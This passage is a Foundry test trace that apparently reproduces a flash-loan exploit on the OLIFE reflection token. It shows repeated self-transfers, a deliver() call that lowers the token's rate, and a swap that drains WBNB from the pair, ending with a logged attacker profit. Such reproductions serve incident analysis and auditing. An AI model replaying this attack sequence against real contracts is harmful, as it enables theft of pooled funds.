    │   │   │   └─ ← [Return] 71534417398279473 [7.153e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 71534417398279473 [7.153e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 4292065043896768 [4.292e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 63665631484468732 [6.366e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000bce7bd7c05900e → 0x00000000000000000000000000000000000000000000000000c1fcf192c958a3
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000011b5b9c3a0859da → 0x0000000000000000000000000000000000000000000000000122fb6a5c2e06ba
    │   │   │   │   @ 9: 0x5bb9ff56fea8579027b1768a559882bc4a161599f83a45d6ffaebca805ecdea4 → 0x5a38191a33ff2422c7d1369d2f130a3ca5521c52814803ea5eabd6632c023e49
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0db42d1160eaeb4fe5728204e9ad3e7ab1325abbf757057db7953cecaf85ab53 → 0x0c3246d49641b7e285924217c327c5fb0c6e61748064c391169256a7d59b0af8
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000236b7387410b746 → 0x0000000000000000000000000000000000000000000000000245f6d4b85c1106
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000019f13118973faa9 → 0x00000000000000000000000000000000000000000000000001ae52adcdbf5469
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x38567d886fee5dc91e4f6cea6d5373140c5e917a64bfc7d0dbdcd098232e4bc7 → 0x3928fb1df5bf057ba69373889388e1d0434364727fdacf6c044b2f65cde83e07
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002decce1dd946ff2 → 0x00000000000000000000000000000000000000000000000002d9b7adc6d0a75d
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 69874967907720741 [6.987e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 69874967907720741 [6.987e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 4192498074463244 [4.192e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 62188721437871461 [6.218e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000c1fcf192c958a3 → 0x00000000000000000000000000000000000000000000000000c6f3f63f9a6751
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000245f6d4b85c1106 → 0x0000000000000000000000000000000000000000000000000254dbe2becf3d12
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0c3246d49641b7e285924217c327c5fb0c6e61748064c391169256a7d59b0af8 → 0x0adad384e1e3731837867943952f634eb2d1f259af1572ccc8720cba3261f578
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x3928fb1df5bf057ba69373889388e1d0434364727fdacf6c044b2f65cde83e07 → 0x39e451496f66cdee9287b14adefaef63e0e71120c18ca578d0be1bdfe98f7d5f
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000001ae52adcdbf5469 → 0x00000000000000000000000000000000000000000000000001bd37bbd4328075
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002d9b7adc6d0a75d → 0x00000000000000000000000000000000000000000000000002d4c0a919ff98af
    │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000122fb6a5c2e06ba → 0x000000000000000000000000000000000000000000000000012a6df15f679cc0
    │   │   │   │   @ 9: 0x5a38191a33ff2422c7d1369d2f130a3ca5521c52814803ea5eabd6632c023e49 → 0x58e0a5ca7fa0df5879c56dc9011aa7904bb5ad37aff8b326108b8c7588c928c9
    │   │   │   └─ ← [Return] true
    │   │   ├─ [22323] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::deliver(66859267695870000 [6.685e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0adad384e1e3731837867943952f634eb2d1f259af1572ccc8720cba3261f578 → 0x00484eabb456397f422ec57e1cba111d484c45c8aad487adb95e43b09824b838
    │   │   │   │   @ 9: 0x58e0a5ca7fa0df5879c56dc9011aa7904bb5ad37aff8b326108b8c7588c928c9 → 0x4e4e20f15213a5bf846dba0388a5555ee13000a6abb7c8070177c36bee8beb89
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000012a6df15f679cc0 → 0x0000000000000000000000000000000000000000000000000217f617b45c1cf0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   └─ ← [Return] 217839506118721725361721643770 [2.178e29]
    │   │   ├─ emit log_named_decimal_uint(key: "[INFO] OLIFE amount in pair after the currentRate reduction", val: 217839506118721725361721643770 [2.178e29], decimals: 9)
    │   │   ├─ [893] 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 5583143203784247 [5.583e15], 1001286315327689621042 [1.001e21], 1681866278 [1.681e9]
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   └─ ← [Return] 217839506118721725361721643770 [2.178e29]
    │   │   ├─ [53936] 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84::swap(0, 1001286315327663894139 [1.001e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1001286315327663894139 [1.001e21])
    │   │   │   │   ├─ emit Transfer(from: 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1001286315327663894139 [1.001e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000003647a396bf8d2bee7b
    │   │   │   │   │   @ 0x4071999b347ef650176ac9588cd0a542b42db90b068e9aa61ca79807f994054d: 0x00000000000000000000000000000000000000000000003647a396bf8eb47e32 → 0x0000000000000000000000000000000000000000000000000000000001888fb7
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   │   └─ ← [Return] 217839506118721725361721643770 [2.178e29]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   │   └─ ← [Return] 25726903 [2.572e7]
    │   │   │   ├─ emit Sync(reserve0: 217839506118721725361721643770 [2.178e29], reserve1: 25726903 [2.572e7])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 217839506118716142218517859523 [2.178e29], amount1In: 0, amount0Out: 0, amount1Out: 1001286315327663894139 [1.001e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x643f3e2600000000003647a396bf8eb47e320000000000000013d5d6d3644637 → 0x643f3e260000000000000000000001888fb70002bfe09db95ab817b9022712fa
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, 969000000000000000000 [9.69e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, value: 969000000000000000000 [9.69e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x00000000000000000000000000000000000000000000000018f403a6310260fd → 0x000000000000000000000000000000000000000000000034a08791aaca8660fd
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000003647a396bf8d2bee7b → 0x000000000000000000000000000000000000000000000001c01008baf3a7ee7b
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 970798066163549364477 [9.707e20]
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 797703995357246689626030 [7.977e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 970798066163549364477 [9.707e20]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 797703995357246689626030 [7.977e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 969000000000000000000 [9.69e20], : 0)
    │   ├─  storage changes:
    │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x00000000000000000000000000000000000000000000000018f403a6310260fd → 0x000000000000000000000000000000000000000000000034a08791aaca8660fd
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 32286315327663894139 [3.228e19]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB balance after exploit", val: 32286315327663894139 [3.228e19], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 18.63s (16.71s CPU time)

Ran 2 test suites in 19.03s (19.18s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
